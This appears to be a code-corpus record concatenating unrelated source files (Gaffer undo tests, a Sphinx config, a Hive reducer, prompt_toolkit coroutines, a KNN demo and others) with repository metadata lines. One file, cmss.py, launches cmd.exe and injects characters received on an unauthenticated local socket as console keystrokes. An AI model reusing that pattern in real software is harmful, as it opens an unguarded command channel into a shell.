PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, # EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR # PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF # LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING # NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # ########################################################################## from __future__ import with_statement import unittest import IECore import Gaffer import GafferTest class UndoTest( GafferTest.TestCase ) : def testSetName( self ) : s = Gaffer.ScriptNode() self.assertEqual( s.undoAvailable(), False ) self.assertEqual( s.redoAvailable(), False ) self.assertRaises( Exception, s.undo ) n = Gaffer.Node() s["a"] = n self.assertEqual( n.getName(), "a" ) n.setName( "b" ) self.assertEqual( n.getName(), "b" ) self.assertEqual( s.undoAvailable(), False ) self.assertEqual( s.redoAvailable(), False ) self.assertRaises( Exception, s.undo ) with Gaffer.UndoContext( s ) : n.setName( "c" ) self.assertEqual( s.undoAvailable(), True ) self.assertEqual( s.redoAvailable(), False ) s.undo() self.assertEqual( s.undoAvailable(), False ) self.assertEqual( s.redoAvailable(), True ) self.assertEqual( n.getName(), "b" ) s.redo() self.assertEqual( s.undoAvailable(), True ) self.assertEqual( s.redoAvailable(), False ) self.assertEqual( n.getName(), "c" ) self.assertRaises( Exception, s.redo ) def testSetInput( self ) : s = Gaffer.ScriptNode() n1 = GafferTest.AddNode() n2 = GafferTest.AddNode() s["n1"] = n1 s["n2"] = n2 with Gaffer.UndoContext( s ) : n1["op1"].setInput( n2["sum"] ) self.assert_( n1["op1"].getInput().isSame( n2["sum"] ) ) s.undo() self.assertEqual( n1["op1"].getInput(), None ) s.redo() self.assert_( n1["op1"].getInput().isSame( n2["sum"] ) ) def testChildren( self ) : s = Gaffer.ScriptNode() n = Gaffer.Node() self.assertEqual( n.parent(), None ) with Gaffer.UndoContext( s ) : s["n"] = n self.assert_( n.parent().isSame( s ) ) s.undo() self.assertEqual( n.parent(), None ) s.redo() self.assert_( n.parent().isSame( s ) ) def testDelete( self ) : s = Gaffer.ScriptNode() n1 = GafferTest.AddNode() n2 = GafferTest.AddNode() n3 = GafferTest.AddNode() s.addChild( n1 ) s.addChild( n2 ) s.addChild( n3 ) n2["op1"].setInput( n1["sum"] ) n2["op2"].setInput( n1["sum"] ) n3["op1"].setInput( n2["sum"] ) n3["op2"].setInput( n2["sum"] ) self.assert_( n2["op1"].getInput().isSame( n1["sum"] ) ) self.assert_( n2["op2"].getInput().isSame( n1["sum"] ) ) self.assert_( n3["op1"].getInput().isSame( n2["sum"] ) ) self.assert_( n3["op2"].getInput().isSame( n2["sum"] ) ) with Gaffer.UndoContext( s ) : s.deleteNodes( filter = Gaffer.StandardSet( [ n2 ] ) ) self.assertEqual( n2["op1"].getInput(), None ) self.assertEqual( n2["op2"].getInput(), None ) self.assert_( n3["op1"].getInput().isSame( n1["sum"] ) ) self.assert_( n3["op2"].getInput().isSame( n1["sum"] ) ) s.undo() self.assert_( n2["op1"].getInput().isSame( n1["sum"] ) ) self.assert_( n2["op2"].getInput().isSame( n1["sum"] ) ) self.assert_( n3["op1"].getInput().isSame( n2["sum"] ) ) self.assert_( n3["op2"].getInput().isSame( n2["sum"] ) ) with Gaffer.UndoContext( s ) : s.deleteNodes( filter = Gaffer.StandardSet( [ n2 ] ), reconnect = False ) self.assertEqual( n2["op1"].getInput(), None ) self.assertEqual( n2["op2"].getInput(), None ) self.assertEqual( n3["op1"].getInput(), None ) self.assertEqual( n3["op2"].getInput(), None ) s.undo() self.assert_( n2["op1"].getInput().isSame( n1["sum"] ) ) self.assert_( n2["op2"].getInput().isSame( n1["sum"] ) ) self.assert_( n3["op1"].getInput().isSame( n2["sum"] ) ) self.assert_( n3["op2"].getInput().isSame( n2["sum"] ) ) def testDisable( self ) : s = Gaffer.ScriptNode() s["n"] = GafferTest.AddNode() with Gaffer.UndoContext( s, Gaffer.UndoContext.State.Disabled ) : s["n"]["op1"].setValue( 10 ) self.assertFalse( s.undoAvailable() ) with Gaffer.UndoContext( s, Gaffer.UndoContext.State.Enabled ) : with Gaffer.UndoContext( s, Gaffer.UndoContext.State.Disabled ) : s["n"]["op1"].setValue( 20 ) self.assertFalse( s.undoAvailable() ) if __name__ == "__main__": unittest.main()
bsd-3-clause
4,500,557,016,804,750,300
30.502703
77
0.644132
false
bjmorgan/vasppy
docs/source/conf.py
1
5544
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # # vasppy documentation build configuration file, created by # sphinx-quickstart on Tue Mar 6 13:36:30 2018. # # This file is execfile()d with the current directory set to its # containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. # import os import sys sys.path.insert(0, os.path.abspath('../../')) # -- General configuration ------------------------------------------------ # If your documentation needs a minimal Sphinx version, state it here. # # needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = ['sphinx.ext.autodoc', 'sphinx.ext.coverage', 'sphinx.ext.mathjax', 'sphinx.ext.viewcode', 'sphinx.ext.githubpages', 'sphinx.ext.napoleon', 'nbsphinx'] autoclass_content = 'both' # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix(es) of source filenames. # You can specify multiple suffix as a list of string: # # source_suffix = ['.rst', '.md'] source_suffix = '.rst' # The master toctree document. master_doc = 'index' # General information about the project. project = 'vasppy' copyright = '2018, Benjamin J. Morgan' author = 'Benjamin J. Morgan' # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. version = '0.4' # The full version, including alpha/beta/rc tags. release = '0.4' # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. # # This is also used if you do content translation via gettext catalogs. # Usually you set "language" from the command line for these cases. language = None # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. # This patterns also effect to html_static_path and html_extra_path exclude_patterns = ['_build', '**.ipynb_checkpoints'] # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # If true, the current module name will be prepended to all description # unit titles (such as .. function::). add_module_names = False # If true, `todo` and `todoList` produce output, else they produce nothing. todo_include_todos = False # -- Options for HTML output ---------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. # html_theme = 'sphinx_rtd_theme' # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. # # html_theme_options = {} nbsphinx_prompt_width = 0 # NbSphinx configuration nbsphinx_execute = 'never' nbsphinx_codecell_lexer = 'python3' # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # Custom sidebar templates, must be a dictionary that maps document names # to template names. # # This is required for the alabaster theme # refs: http://alabaster.readthedocs.io/en/latest/installation.html#sidebars html_sidebars = { '**': [ 'relations.html', # needs 'show_related': True theme option to display 'searchbox.html', ] } # -- Options for HTMLHelp output ------------------------------------------ # Output file base name for HTML help builder. htmlhelp_basename = 'vasppydoc' # -- Options for LaTeX output --------------------------------------------- latex_elements = { # The paper size ('letterpaper' or 'a4paper'). # # 'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). # # 'pointsize': '10pt', # Additional stuff for the LaTeX preamble. # # 'preamble': '', # Latex figure (float) alignment # # 'figure_align': 'htbp', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, # author, documentclass [howto, manual, or own class]). latex_documents = [ (master_doc, 'vasppy.tex', 'vasppy Documentation', 'Benjamin J. Morgan', 'manual'), ] # -- Options for manual page output --------------------------------------- # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [ (master_doc, 'vasppy', 'vasppy Documentation', [author], 1) ] # -- Options for Texinfo output ------------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ (master_doc, 'vasppy', 'vasppy Documentation', author, 'vasppy', 'One line description of project.', 'Miscellaneous'), ]
mit
-909,140,408,415,588,900
28.647059
79
0.675866
false
intel-hadoop/Big-Data-Benchmark-for-Big-Bench
engines/hive/queries/q08/q08_filter_sales_with_reviews_viewed_before.py
1
3144
#"INTEL CONFIDENTIAL" #Copyright 2016 Intel Corporation All Rights Reserved. # #The source code contained or described herein and all documents related to the source code ("Material") are owned by Intel Corporation or its suppliers or licensors. Title to the Material remains with Intel Corporation or its suppliers and licensors. The Material contains trade secrets and proprietary and confidential information of Intel or its suppliers and licensors. The Material is protected by worldwide copyright and trade secret laws and treaty provisions. No part of the Material may be used, copied, reproduced, modified, published, uploaded, posted, transmitted, distributed, or disclosed in any way without Intel's prior express written permission. # #No license under any patent, copyright, trade secret or other intellectual property right is granted to or conferred upon you by disclosure or delivery of the Materials, either expressly, by implication, inducement, estoppel or otherwise. Any license under such intellectual property rights must be express and approved by Intel in writing. import sys import logging import traceback import os import time from time import strftime web_page_type_filter=sys.argv[1] seconds_before_sale_filter = long(sys.argv[2]) if __name__ == "__main__": line = '' try: current_key = '' last_review_date=-1 #sales_sk should be distinct last_sales_sk = '' #expects input to be partitioned by uid and sorted by date_sk (and timestamp) ascending for line in sys.stdin: # lustered by wcs_user_sk and by wcs_user_sk, tstamp_inSec_str, wcs_sales_sk, wp_type ascending in this order => ensured by hive wcs_user_sk, tstamp_inSec_str, wcs_sales_sk, wp_type = line.strip().split("\t") #reset on partition change if current_key != wcs_user_sk : current_key = wcs_user_sk last_review_date = -1 last_sales_sk = '' tstamp_inSec = long(tstamp_inSec_str) #found review before purchase, save last review date if wp_type == web_page_type_filter: last_review_date = tstamp_inSec continue #if we encounter a sold item ( wcs_sales_sk.isdigit() => valid non null value) and a user looked at a review within 'seconds_before_sale_filter' => print found sales_sk backt to hive #if last_review_date > 0 and (tstamp_inSec - last_review_date) <= seconds_before_sale_filter and wcs_sales_sk.isdigit() : #version with duplicate sales_sk's if last_review_date > 0 and (tstamp_inSec - last_review_date) <= seconds_before_sale_filter and wcs_sales_sk.isdigit() and last_sales_sk != wcs_sales_sk : #version reduced duplicate sales_sk's last_sales_sk = wcs_sales_sk print wcs_sales_sk except: ## should only happen if input format is not correct, like 4 instead of 5 tab separated values logging.basicConfig(level=logging.DEBUG, filename=strftime("/tmp/bigbench_q8_reducer_%Y%m%d-%H%M%S.log")) logging.info('web_page_type_filter: ' + web_page_type_filter ) logging.info('seconds_before_sale_filter: ' + seconds_before_sale_filter ) logging.info("line from hive: \"" + line + "\"") logging.exception("Oops:") raise sys.exit(1)
apache-2.0
-7,692,260,263,573,723,000
51.4
663
0.735687
false
viswimmer1/PythonGenerator
data/python_files/34574373/cmss.py
1
2623
import win32pipe import win32console import win32process import time import win32con import codecs import ctypes user32 = ctypes.windll.user32 CONQUE_WINDOWS_VK = { '3' : win32con.VK_CANCEL, '8' : win32con.VK_BACK, '9' : win32con.VK_TAB, '12' : win32con.VK_CLEAR, '13' : win32con.VK_RETURN, '17' : win32con.VK_CONTROL, '20' : win32con.VK_CAPITAL, '27' : win32con.VK_ESCAPE, '28' : win32con.VK_CONVERT, '35' : win32con.VK_END, '36' : win32con.VK_HOME, '37' : win32con.VK_LEFT, '38' : win32con.VK_UP, '39' : win32con.VK_RIGHT, '40' : win32con.VK_DOWN, '45' : win32con.VK_INSERT, '46' : win32con.VK_DELETE, '47' : win32con.VK_HELP } def make_input_key(c, control_key_state=None): kc = win32console.PyINPUT_RECORDType (win32console.KEY_EVENT) kc.KeyDown = True kc.RepeatCount = 1 cnum = ord(c) if cnum == 3: pid_list = win32console.GetConsoleProcessList() win32console.GenerateConsoleCtrlEvent(win32con.CTRL_C_EVENT, 0) return else: kc.Char = unicode(c) if str(cnum) in CONQUE_WINDOWS_VK: kc.VirtualKeyCode = CONQUE_WINDOWS_VK[str(cnum)] else: kc.VirtualKeyCode = ctypes.windll.user32.VkKeyScanA(cnum) #kc.VirtualKeyCode = ctypes.windll.user32.VkKeyScanA(cnum+96) #kc.ControlKeyState = win32con.LEFT_CTRL_PRESSED return kc #win32console.AttachConsole() coord = win32console.PyCOORDType con_stdout = win32console.GetStdHandle(win32console.STD_OUTPUT_HANDLE) con_stdin = win32console.GetStdHandle(win32console.STD_INPUT_HANDLE) flags = win32process.NORMAL_PRIORITY_CLASS si = win32process.STARTUPINFO() si.dwFlags |= win32con.STARTF_USESHOWWINDOW (handle1, handle2, i1, i2) = win32process.CreateProcess(None, "cmd.exe", None, None, 0, flags, None, '.', si) time.sleep(1) #size = con_stdout.GetConsoleScreenBufferInfo()['Window'] # with codecs.open("log.txt", "w", "utf8") as f: # for i in xrange(0, size.Bottom): # f.write(con_stdout.ReadConsoleOutputCharacter(size.Right+1, coord(0, i))) # f.write("\n") import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) HOST = "127.0.0.1" PORT = 5554 s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind((HOST, PORT)) s.listen(1) (sc, scname) = s.accept() while True: msg = sc.recv(1) if ord(msg) == 0: break keys = [make_input_key(msg)] if keys: con_stdin.WriteConsoleInput(keys) win32process.TerminateProcess(handle1, 0)
gpl-2.0
1,044,929,001,205,104,300
26.846154
109
0.643157
false
airanmehr/bio
Scripts/TimeSeriesPaper/Plot/topSNPs.py
1
1589
''' Copyleft Oct 14, 2016 Arya Iranmehr, PhD Student, Bafna Lab, UC San Diego, Email: [email protected] ''' import numpy as np; np.set_printoptions(linewidth=200, precision=5, suppress=True) import pandas as pd; pd.options.display.max_rows = 20; pd.options.display.expand_frame_repr = False import seaborn as sns import matplotlib as mpl import os; home = os.path.expanduser('~') + '/' import Utils.Util as utl import Scripts.TimeSeriesPaper.RealData.Utils as rutl a = rutl.loadAllScores().groupby(level='h', axis=1).apply(rutl.HstatisticAll) df = pd.read_pickle(utl.outpath + 'real/scores.df') i = df.lrd.sort_values().index[-1] df.loc[i] cd = pd.read_pickle(utl.outpath + 'real/CD.F59.df') import Utils.Plots as pplt import pylab as plt names = rutl.loadSNPIDs() sns.set_style("white", {"grid.color": "0.9", 'axes.linewidth': .5, "grid.linewidth": "9.99"}) mpl.rc('font', **{'family': 'serif', 'serif': ['Computer Modern']}); mpl.rc('text', usetex=True) reload(pplt) f, ax = plt.subplots(1, 2, sharey=True, dpi=300, figsize=(4, 2)) i = a[0.5].sort_values().index[-1] sns.set_context("notebook", font_scale=1, rc={"lines.linewidth": 1.2}) pplt.plotSiteReal(cd.loc[i], ax=ax[0], legend=True) ax[0].set_title('{}:{:.0f} ({})'.format(i[0], i[1], names.loc[i]), fontsize=8) i = df.lrdiff.sort_values().index[-1] pplt.plotSiteReal(cd.loc[i], ax=ax[1]) sns.set_context("notebook", font_scale=1, rc={"lines.linewidth": 1.2}) ax[1].set_title('{}:{:.0f} ({})'.format(i[0], i[1], names.loc[i]), fontsize=8) plt.gcf().subplots_adjust(bottom=0.2) pplt.savefig('topSNPs', 300) plt.show()
mit
2,218,888,666,753,329,700
32.104167
102
0.680302
false
edx/edx-load-tests
util/generate_summary.py
1
3450
# -*- coding: utf-8 -*- """ Generate a summary of a previous loadtest run in this environment. See for usage example in a jenkins job dsl: https://github.com/edx/jenkins-job-dsl/blob/master/testeng/jobs/loadtestDriver.groovy Prerequisites: A logfile produced by util/run-loadtest.sh should be present in its standard location. Output: Produces summary on standard output in YAML format. The structure is as follows: * monitoring_links: * list of link text/url pairs pointing to monitoring dashboards. * timeline: * begin: ISO 8601 date for when the test began. * end: ISO 8601 date for when the test ended. """ from datetime import timedelta import yaml import helpers.markers from util.app_monitors_config import MONITORS # Refer to util/run-loadtest.sh in case this file path changes. STANDARD_LOGFILE_PATH = "results/log.txt" def parse_logfile_events(logfile): """ Parse the logfile for events Parameters: logfile (file): the file containing locust logs for a single load test Returns: iterator of (datetime.datetime, str) tuples: the parsed events in the order they are encountered. """ for line in logfile: data = helpers.markers.parse_logfile_event_marker(line) if data is not None: yield (data['time'], data['event']) def get_time_bounds(logfile): """ Determine when the load test started and stopped. Parameters: logfile (file): the file containing locust logs for a single load test Returns: two-tuple of datetime.datetime: the time bounds of the load test """ begin_time = end_time = None relevant_events = ['locust_start_hatching', 'edx_heartbeat', 'quitting'] relevant_times = [ time for time, event in parse_logfile_events(logfile) if event in relevant_events ] begin_time, end_time = (min(relevant_times), max(relevant_times)) return (begin_time, end_time) def main(): """ Generate a summary of a previous load test run. This script assumes "results/log.txt" is the logfile in question. """ with open(STANDARD_LOGFILE_PATH) as logfile: loadtest_begin_time, loadtest_end_time = get_time_bounds(logfile) monitoring_links = [] for monitor in MONITORS: monitoring_links.append({ 'url': monitor.url( begin_time=loadtest_begin_time, end_time=loadtest_end_time, ), 'text': u'{}: {} ({} — {})'.format( monitor.monitoring_service_name, monitor.app_name, # We use naive datetimes (i.e. no attached tz) and just # assume UTC all along. Tacking on the "Z" implies UTC. loadtest_begin_time.strftime('%Y-%m-%dT%H:%M:%SZ'), loadtest_end_time.strftime('%Y-%m-%dT%H:%M:%SZ'), ), }) print(yaml.dump( { 'timeline': { 'begin': loadtest_begin_time.strftime('%Y-%m-%dT%H:%M:%SZ'), 'end': loadtest_end_time.strftime('%Y-%m-%dT%H:%M:%SZ'), }, 'monitoring_links': monitoring_links }, default_flow_style=False, # Represent objects using indented blocks # rather than inline enclosures. allow_unicode=True, )) if __name__ == "__main__": main()
apache-2.0
-6,008,860,902,320,476,000
30.345455
85
0.606729
false
lmregus/Portfolio
python/design_patterns/env/lib/python3.7/site-packages/prompt_toolkit/eventloop/coroutine.py
1
3783
from __future__ import unicode_literals import types from prompt_toolkit.eventloop.defaults import get_event_loop from prompt_toolkit.eventloop.future import Future __all__ = [ 'From', 'Return', 'ensure_future', ] def ensure_future(future_or_coroutine): """ Take a coroutine (generator) or a `Future` object, and make sure to return a `Future`. """ if isinstance(future_or_coroutine, Future): return future_or_coroutine elif isinstance(future_or_coroutine, types.GeneratorType): return _run_coroutine(future_or_coroutine) else: raise ValueError('Expecting coroutine or Future object. Got %r: %r' % ( type(future_or_coroutine), future_or_coroutine)) class Return(Exception): """ For backwards-compatibility with Python2: when "return" is not supported in a generator/coroutine. (Like Trollius.) Instead of ``return value``, in a coroutine do: ``raise Return(value)``. """ def __init__(self, value): self.value = value def __repr__(self): return 'Return(%r)' % (self.value, ) def From(obj): """ Used to emulate 'yield from'. (Like Trollius does.) """ return ensure_future(obj) def _run_coroutine(coroutine): """ Takes a generator that can yield Future instances. Example: def gen(): yield From(...) print('...') yield From(...) ensure_future(gen()) The values which are yielded by the given coroutine are supposed to be `Future` objects. """ assert isinstance(coroutine, types.GeneratorType) loop = get_event_loop() result_f = loop.create_future() # Wrap this future in a `_FutureRef`. We need this in order to be able to # break all its references when we're done. This is important # because in case of an exception, we want to be sure that # `result_f.__del__` is triggered as soon as possible, so that we see the # exception. # (If `step_next` had a direct reference to `result_f` and there is a # future that references `step_next`, then sometimes it won't be cleaned up # immediately. - I'm not sure how exactly, but in that case it requires the # garbage collector, because refcounting isn't sufficient.) ref = _FutureRef(result_f) # Loop through the generator. def step_next(f=None): " Execute next step of the coroutine." try: if f is None: new_f = coroutine.send(None) else: exc = f.exception() if exc: new_f = coroutine.throw(exc) else: new_f = coroutine.send(f.result()) except StopIteration: # Stop coroutine. Make sure that a result has been set in the future, # this will call the callbacks. (Also, don't take any result from # StopIteration, it has already been set using `raise Return()`. if not ref.future.done(): ref.future.set_result(None) ref.forget() except Return as e: ref.future.set_result(e.value) ref.forget() except BaseException as e: ref.future.set_exception(e) ref.forget() else: # Process yielded value from coroutine. assert isinstance(new_f, Future), 'got %r' % (new_f, ) @new_f.add_done_callback def continue_(_): step_next(new_f) # Start processing coroutine. step_next() return result_f class _FutureRef(object): def __init__(self, future): self.future = future def forget(self): " Forget reference. " self.future = None
mit
911,875,866,142,147,300
29.02381
81
0.591594
false
bhdouglass/remindor-common
tests/test_time_validation.py
1
1362
import remindor_common.datetimeutil as d valid_singular = [ "now", "1:00pm", "1:00 pm", "13:00", "13", "1300", "1pm" ] valid_repeating = [ "every hour", "every hour from 1 to 1:00pm", "every minute", "every minute from 2:00pm to 1500", "every 3 minutes", "every 3 minutes from 3:30pm to 3:45 pm", "every 2 hours", "every 2 hours from 8 to 10" ] invalid = [ "every minute from", "asdf", "every minutes to 3", "2500", "25", "-1", "every -2 minutes", "every minute from 5 to 1", "every minute from 5 to 5", "8/12/13", "October 12", "7-21-2013" ] print "testing valid singular times" for row in valid_singular: print "?" + row + "?" value = d.str_time_simplify(row) print "!" + str(value) + "!" if value == None: print "value should not be None!" exit() print "" print "testing valid repeating times" for row in valid_repeating: print "?" + row + "?" value = d.str_time_simplify(row) print "!" + str(value) + "!" if value == None: print "value should not be None!" exit() print "" print "testing invalid times" for row in invalid: print row value = d.str_time_simplify(row) print value if value != None: print "value should be None!" exit()
gpl-3.0
4,687,957,397,284,547,000
18.73913
45
0.550661
false
jokajak/itweb
data/env/lib/python2.6/site-packages/repoze.what-1.0.9-py2.6.egg/repoze/what/release.py
1
1208
# -*- coding: utf-8 -*- ############################################################################## # # Copyright (c) 2008-2009, Gustavo Narea <[email protected]> # All Rights Reserved. # # This software is subject to the provisions of the BSD-like license at # http://www.repoze.org/LICENSE.txt. A copy of the license should accompany # this distribution. THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL # EXPRESS OR IMPLIED WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, # THE IMPLIED WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND # FITNESS FOR A PARTICULAR PURPOSE. # ############################################################################## """ repoze.what release information. The version number is loaded to help the Quickstart plugin configure repoze.what correctly, depending on the version available -- although it may be useful on other packages. """ import os _here = os.path.abspath(os.path.dirname(__file__)) _root = os.path.dirname(os.path.dirname(_here)) version = open(os.path.join(_root, 'VERSION.txt')).readline().rstrip() # The major version: If version=='3.0.2rc4', the major version is int(3). major_version = int(version.split('.')[0])
gpl-3.0
-1,875,028,804,024,402,000
35.606061
78
0.639901
false
picleslivre/schemaprobe
schemaprobe.py
1
2343
from __future__ import unicode_literals import sys import functools import json try: import jsonschema except ImportError: jsonschema = None try: import requests except ImportError: requests = None __version__ = '1.0.0.dev1' __all__ = ['ensure', 'JsonProbe'] # -------------- # Py2 compat # -------------- PY2 = sys.version_info[0] == 2 if PY2: string_types = (str, unicode) else: string_types = (str,) # -------------- class JsonProbe(object): """ An instance that knows how to perform validations against json-schema. """ _jsonschema = jsonschema def __init__(self, schema): """ :param schema: json-schema as json-encoded text or python datastructures. """ if self._jsonschema is None: raise TypeError('Missing dependency `jsonschema`.') self.schema = self._normalize_input(schema) def validate(self, input): """ Validate `input` agains the given schema. :param input: json-encoded text or python datastructures. :returns: boolean """ data = self._normalize_input(input) try: jsonschema.validate(data, self.schema) except self._jsonschema.ValidationError: return False else: return True def _normalize_input(self, input): """ Always return python datastructures. :param input: json-encoded text or python datastructures. """ if isinstance(input, string_types): return json.loads(input) else: return input def ensure(probe): """ Decorator that asserts the returned value is valid against `probe`. """ def ensure_decorator(f): @functools.wraps(f) def wrapper(*args, **kwargs): result = f(*args, **kwargs) if probe.validate(result): return result else: raise TypeError('Returned data does not conform with the given schema.') return wrapper return ensure_decorator class TestCaseMixin(object): def assertSchemaIsValid(self, probe, resource_url, msg=None): api_sample = requests.get(resource_url) if not probe.validate(api_sample.json()): raise self.failureException(msg or 'Schema is invalid.')
bsd-2-clause
1,664,159,037,023,619,000
23.154639
88
0.593683
false
sighingnow/sighingnow.github.io
resource/k_nearest_neighbors/dating.py
1
3622
#! /usr/bin/env python # -*- coding: utf-8 ''' Name: dating.py(KNN algorithm) Training and test dataset: dating.txt Created on Feb 8, 2015 @author: Tao He ''' __author__ = 'Tao He' from numpy import array as nmarray from matplotlib import pyplot as plt LABEL_MAP = { 'didntLike': 1, 'smallDoses': 2, 'largeDoses': 3, } ATTR_MAP = { 1: 'Number of frequent flyer miles earned per year', 2: 'Percentage of time spent playing video games', 3: 'Liters of ice cream consumed per week', } def create_dataset(filename=None): ''' Return data group and labels. Get the data from file. If the filename is not specialed, return None. dataformat: flyerMiles, gameTime, icecream, label. ''' def normalize_data(data=None): ''' Normalized dataset. Normalize all data to range 0-1. ''' if data is None: return None for column in range(data[0].__len__()): max_val, min_val = max(data[:, column]), min(data[:, column]) for row in range(data.__len__()): data[row][column] = (data[row][column]-min_val)/(max_val-min_val) return data if filename == None: return (None, None) group = [] labels = [] with open(filename, mode='r') as fp_data: for line in fp_data: group.append([float(num) for num in line[:-1].split('\t')[0:3]]) labels.append(LABEL_MAP[line[:-1].split('\t')[3]]) return normalize_data(nmarray(group)), labels def draw_pic(group=None, labels=None, x=0, y=0): ''' Draw a subplot from data group. ''' if group is None or labels is None: return None name = 'knn-dating' figure = plt.figure(num=name, dpi=100) ax_main = figure.add_subplot(1, 1, 1, xlabel=ATTR_MAP[x+1], ylabel=ATTR_MAP[y+1], title=name) ax_main.scatter(group[:, x], group[:, y], s=15*nmarray(labels), c=[[i/LABEL_MAP.__len__()] for i in labels]) plt.show() ## plt.savefig('%s.png'%name, format='png', dpi=100) def knn_classify(group, labels, attrs, ratio=0.5, item=0, k=3): ''' Return the type of item. knn classify function. ''' def get_dist(i, j): ''' Return the distence of group[i] and group[j]. ''' dist = 0.0 for attr in attrs: dist += (group[i][attr]-group[j][attr])*(group[i][attr]-group[j][attr]) return dist length = group.__len__() distence = [] for i in range(int(length*ratio), length): distence.append((i, get_dist(item, i))) cnt = {} distence.sort(key=lambda item: item[1]) for i in range(k): label = labels[distence[i][0]] if label in cnt: cnt[label] += 1 else: cnt[label] = 1 return sorted(cnt.items(), key=lambda item: item[1], reverse=True)[0][0] def knn(): ''' KNN classify algorithm. ''' data, labels = create_dataset('dating.txt') ratio, attr = 0.5, [0, 1, 2] cnt, cnt_correct = 0, 0 length = data.__len__() for i in range(0, int(length*ratio)): cnt += 1 knn_type = knn_classify(data, labels, attr, ratio, i, 3) # print('case[%d]: real: %d, knn: %d'%(i, labels[i], knn_type)) if knn_type == labels[i]: cnt_correct += 1 print('total: %d, correct: %d, correct ratio: %f'%(cnt, cnt_correct, cnt_correct/cnt)) if __name__ == '__main__': knn() # vim: set sw=4, ts=4, fileencoding=utf-8
mit
8,461,827,833,393,829,000
27.933884
97
0.543622
false
chexov/rexpython
rexpython/test_observable.py
1
4158
import logging import multiprocessing import sys import time from unittest import TestCase import rexpython as rx logging.basicConfig(format="%(asctime)-15s %(name)-25s %(levelname)s %(process)d %(message)s") log = logging.getLogger(__name__) log.setLevel(logging.DEBUG) class TestOnError(TestCase): def test_onerror(self): def o(em): try: raise ValueError("42") except ValueError: print "GAGA" em.onError(sys.exc_info()) rx.Observable.create(o) \ .doOnError(lambda e: log.debug("failed. good. %s" % str(e))) \ .subscribe(rx.LambdaObserver(on_error=lambda e: log.debug("cool. on_error fired"), on_complete=lambda: self.fail("should fail") )) def test_onerror_multiprocess(self): main_pid = multiprocessing.current_process().pid def o(em): log.error(main_pid) log.error(multiprocessing.current_process().pid) assert main_pid != multiprocessing.current_process().pid try: raise ValueError("42") except ValueError: log.error("GAGA") em.onError(sys.exc_info()) log.debug("hello") d = rx.Observable.create(o) \ .doOnError(lambda e: log.debug("failed. good. %s" % str(e))) \ .subscribeOn(multiprocessing.Process) \ .subscribe(rx.LambdaObserver(on_error=lambda e: log.debug("cool. on_error fired"), on_complete=lambda: self.fail("should fail") )) print ("disp", d) class TestObservable(TestCase): def test_blockingSubscribe(self): d = rx.Observable.from_(xrange(1, 4)).blockingSubscribe( on_next=lambda i: sys.stdout.write("from=%s\n" % i), on_complete=lambda: sys.stdout.write("!! complete\n") ) print d def test_play(self): def ga(i): while True: log.debug("ga %s" % i) time.sleep(1) plist = [] for i in xrange(1, 5): p = multiprocessing.Process(target=ga, args=(i,)) p.start() plist.append(p) for pp in plist: print pp pp.join() print "PLAY" def test_observeOn(self): def emit(emitter): """ :type emitter: rx.ObservableEmitter """ emitter.setDisposable(rx.ActionDisposable(lambda: sys.stdout.write("disposed"))) for i in xrange(1, 30): log.debug("emit %s" % i) emitter.onNext(i) time.sleep(1) emitter.onComplete() log.info("hello") log.debug("main process is %s\n" % multiprocessing.current_process().pid) o = rx.Observable.create(emit).observeOn(multiprocessing.Process) d = o \ .doOnNext(lambda x: log.debug("doonnext=%s" % x)).map(lambda x: x * 10) \ .blockingSubscribe(on_next=lambda x: log.debug("subscribe x=%s" % x), on_error=lambda e: log.error("onerror!!!!1111111")) print "d=", d # def test_subscribeOn(self): # def emit(emitter): # """ # # :type emitter: rexpython.Emitter # """ # for i in xrange(1, 40): # log.debug("emit %s" % i) # emitter.onNext(i) # time.sleep(1) # # o = rx.Observable.create(emit).doOnNext(lambda x: log.debug("doonnext=%s" % x)) # d = o.subscribeOn(multiprocessing.Process).subscribe( # rx.LambdaObserver(on_next=lambda x: log.debug("subscribe x=%s" % x))) # print "d=", d
mit
3,438,136,467,915,082,000
33.65
97
0.481241
false
AYJAYY/KenoDB
keno.py
1
4245
